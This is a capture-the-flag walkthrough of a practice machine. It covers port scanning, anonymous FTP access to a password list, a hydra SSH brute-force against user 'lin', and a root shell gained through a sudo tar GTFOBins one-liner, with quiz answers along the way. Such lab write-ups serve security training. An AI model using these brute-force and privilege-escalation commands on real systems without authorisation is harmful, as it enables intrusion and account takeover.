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1) Enumeration / Service Discovery
# Nmap 7.91 scan initiated Mon Jul 26 08:17:23 2021 as: nmap -p- -A -Pn -oA resultsNmap -vv 10.10.61.20
adjust_timeouts2: packet supposedly had rtt of -495795 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -495795 microseconds. Ignoring time.
Nmap scan report for 10.10.61.20
Host is up, received user-set (0.16s latency).
Scanned at 2021-07-26 08:17:24 IST for 800s
Not shown: 55529 filtered ports, 10003 closed ports
Reason: 55529 no-responses and 10003 resets
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 60 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.17.9.26
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack ttl 60 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCgcwCtWTBLYfcPeyDkCNmq6mXb/qZExzWud7PuaWL38rUCUpDu6kvqKMLQRHX4H3vmnPE/YMkQIvmz4KUX4H/aXdw0sX5n9jrennTzkKb/zvqWNlT6zvJBWDDwjv5g9d34cMkE9fUlnn2gbczsmaK6Zo337F40ez1iwU0B39e5XOqhC37vJuqfej6c/C4o5FcYgRqktS/kdcbcm7FJ+fHH9xmUkiGIpvcJu+E4ZMtMQm4bFMTJ58bexLszN0rUn17d2K4+lHsITPVnIxdn9hSc3UomDrWWg+hWknWDcGpzXrQj
CajO395PlZ0SBNDdN+B14E0m6lRY9GlyCD9hvwwB
| 256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMCu8L8U5da2RnlmmnGLtYtOy0Km3tMKLqm4dDG+CraYh7kgzgSVNdAjCOSfh3lIq9zdwajW+1q9kbbICVb07ZQ=
| 256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICqmJn+c7Fx6s0k8SCxAJAoJB7pS/RRtWjkaeDftreFw
80/tcp open http syn-ack ttl 60 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2) Foothold
Observations
Port 80 - Apache 2.4.18
Home page seems to have a big image from the Cowboy Bebop anime. Which seems to be stored in the
/images/
dir. Visiting that dir shows that dir listing allowed. Running feroxbuster on the web portal in parallel.
- FTP Anon login allowed. Got two files -> locks.txt and tasks.txt.
└─$ ftp 10.10.61.20
Connected to 10.10.61.20.
220 (vsFTPd 3.0.3)
Name (10.10.61.20:kali): Anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt
-rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt
226 Directory send OK.
tasks.txt
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
-lin
Q3: Who wrote the task list?
A3: lin
locks.txt
seems to contain a what looks like a list of passwords.
Let's try to bruteforce ssh with the probable password list provided and the username lin
└─$ hydra -l lin -P locks.txt ssh://10.10.61.20
[22][ssh] host: 10.10.61.20 login: lin password: CENSORED
Success!
Q4: What service can you bruteforce with the text file found?
A4: SSHQ5: What is the users password?
A5: Result ofssh
bruteforce usinghydra
Let's ssh into the machine with this username/password combo. This allows us to get user.txt
Q6: user.txt
A6: Answer in/home/lin/user.txt
Now we have a proper foothold in the machine.
3) Privilege Escalation
lin@bountyhacker:~/Desktop$ sudo -l
[sudo] password for lin:
Matching Defaults entries for lin on bountyhacker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User lin may run the following commands on bountyhacker:
(root) /bin/tar
So we can run tar
as root
user. Note the absence of NOPASSWD
here. You will still need the lin user`s password to do this. Fortunately we have that.
Using Tar GTFOBins for Privilege Escalation
`
lin@bountyhacker:~/Desktop$ sudo tar xf /dev/null -I '/bin/sh -c "sh <&2 1>&2"'
# id
uid=0(root) gid=0(root) groups=0(root)
`
Use this shell to navigate to /root/
and get the root flag.
Q7: root.txt
A7: Answer in/root/root.txt
Pretty simple box to solve. Thanks for reading!
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